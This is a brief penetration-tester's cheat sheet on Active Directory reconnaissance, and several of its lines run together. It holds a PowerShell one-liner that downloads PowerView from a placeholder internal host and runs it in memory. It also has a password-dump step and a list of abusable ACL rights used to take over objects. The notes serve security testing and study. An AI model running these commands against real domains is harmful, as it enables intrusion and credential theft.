Active Directory Recon
Enum all inside domain
Check User's Priviledge in Domain
net user <current user> /domainGlobal Group = PswReader
// import the powerview.ps1
IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/powerview.ps1')
// dump the password information
Get-ADObject <hostname1>,<hostname2>Object Control List (ACL)
GenericAll --> Full permission on object
GenericWrite --> Edit certain attributes on the object
WriteOwner --> Change ownership of the object
WriteDACL --> Edit ACE's applied to object
AllExtendedRights --> Change password, reset password, etc.
ForceChangePassword --> Password change for object
Self (Self-Membership) --> Add ourselves to for example a groupLDAP Search
Have User & Pass SVC?
Have User List?
TGT?
PsLoggedon.exe
Seatbelt.exe
Last updated